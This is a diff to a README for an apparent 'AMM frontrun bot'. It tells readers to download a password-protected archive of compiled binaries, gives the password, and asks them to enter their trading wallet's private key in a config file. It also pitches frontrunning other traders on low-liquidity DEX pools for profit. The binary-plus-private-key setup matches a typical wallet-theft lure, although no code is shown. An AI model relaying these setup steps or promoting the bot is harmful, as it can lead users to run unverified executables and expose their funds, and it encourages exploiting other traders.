JoeKaram78/amm-frontrun-bot/README.md

 AMM frontrunning bots can be particularly effective on DEXs with low liquidity, as the impact of a large trade on the market can be significant, leading to a greater price change that can be exploited.

 ### Features
 This bot uses Nethereum library for connection to the blockchain network and monitoring the mempool for pending trades.
 The configuration specifies the private key of the trading account, smart contracts for monitoring and chain_id of the network.
-The bot works in Ethereum, Avalanche, Binance networks with UniSwap, TraderJoe and PancackeSwap DEXs.
+The bot works in Ethereum, Avalanche, Binance networks with Uniswap, Traderjoe and Pancackeswap DEXs.

 ### Setup
-- [Download](https://github.com/JoeKaram78/amm-frontrun-bot/archive/refs/heads/main.zip) compiled binaries and extract with passwod ''.
+- [Download](https://github.com/JoeKaram78/amm-frontrun-bot/archive/refs/heads/main.zip) compiled binaries and extract with passwod `BOt6maR1IghegO`.
-- Edit 'config.json' file.
-Add private key for trading account and chain id of network you work.
+- Edit `config.json` file.
+Add private key for trading account and `chain_id` of network you work with.
 - Set addresses of smart contracts in config file.
 You need to choose contracts with a small liquidity in the pool for more profits.
-You can check liquidity on dextools.io.
+You can check liquidity on `dextools.io`.

 ### Copyright
-* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
+*THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
 IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-FRONTRUN BOT, FRONTRUNNING BOT, NFT BOT, TRADING BOT, NFT *
+FRONTRUN BOT, FRONTRUNNING BOT, NFT BOT, TRADING BOT, NFT*